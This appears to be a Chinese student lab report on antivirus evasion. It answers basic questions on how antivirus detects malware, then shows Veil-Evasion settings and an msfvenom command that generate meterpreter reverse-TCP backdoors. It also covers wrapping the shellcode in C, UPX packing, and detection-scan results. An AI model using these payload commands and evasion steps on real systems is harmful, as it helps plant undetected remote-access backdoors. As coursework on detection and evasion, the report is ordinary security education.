1. 程式人生 > >Exp3 免殺原理與實踐

Exp3 免殺原理與實踐

asi 目標 專業 http lac 基礎 put 源文件 是個

一、基礎問題回答

(1)殺軟是如何檢測出惡意代碼的?

-檢測特征碼


-基於行為檢測

-啟發式檢測類似

(2)免殺是做什麽?

使惡意軟件不被AV檢測出來

(3)免殺的基本方法有哪些?

改變特征碼。

改變行為方式。

二.開始實驗

1.原始的後門程序

將上此實驗產生的後門文件直接拷貝到win主機下(我的殺毒軟件是騰訊管家)

技術分享圖片

添加信任以後放在 http://www.virscan.org/上掃描,由於文件名不被允許,我改成了自己的名字,下圖是結果。

技術分享圖片

技術分享圖片

技術分享圖片

2.veil-evasion版本

Veil-Evasion是一個與Metasploit有點類似的軟件,已經在kali虛擬機裏,如果沒有可以進行在線安裝:sudo apt-get install veil-evasion,我的kali虛擬機安裝失敗,求助了很多同學也沒有解決的辦法,只好用舍友的電腦來做。

在終端下輸入指令veil-evasion即可打開軟件,根據menu的提示依次鍵入以下指令:

use python/meterpreter/rev_tcp //設置payload
set LHOST 192.168.120.129 //設置反彈連接IP(kali的ip)
set port 4303 //設置反彈端口4318
generate //生成
4303 //程序名

技術分享圖片

技術分享圖片

該可執行文件存在kali計算機的/var/lib/veil-evasion/output/compiled/文件夾裏,點擊places的fengjia即可找到相應的文件夾:

同樣的,我們放到該網站上掃描

技術分享圖片

3.C語言調用Shellcode版本

在Kali下生成一個C語言格式的shellcode數組,回連的IP為Kali的IP,端口自定。

輸入代碼msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=4303 -f c

技術分享圖片

在DEV C++中編譯運行exe,在網站上掃描一下。嘗試回連,並成功。

技術分享圖片

技術分享圖片

技術分享圖片

這個報毒率已經比較低了。

4.C調用升級版本加殼壓縮殼UPX直接用upx將MSF直接生成的文件加殼。

技術分享圖片

在網站上掃描

技術分享圖片

居然是安全的文件!

接下來是我的電腦管家對三個文件的掃描結果

技術分享圖片

三.距離實戰還有那些距離和技術?

我們如何穩定的監聽目標主機的活動,就算是考慮周全的病毒也還是有被發現的可能,這是個問題。

四.實驗感想

這次實驗我很失落,因為我安裝veil的過程中總是出現問題,我更換了源文件也沒用,只好用舍友的電腦做。通過這次實驗我清楚認識到了電腦被入侵是多麽容易的一件事。這更加提高了保護自己電腦的警惕心,因為殺毒軟件也不是絕對安全的。難以想象那些專業黑客入侵我們電腦是多麽容易。

Exp3 免殺原理與實踐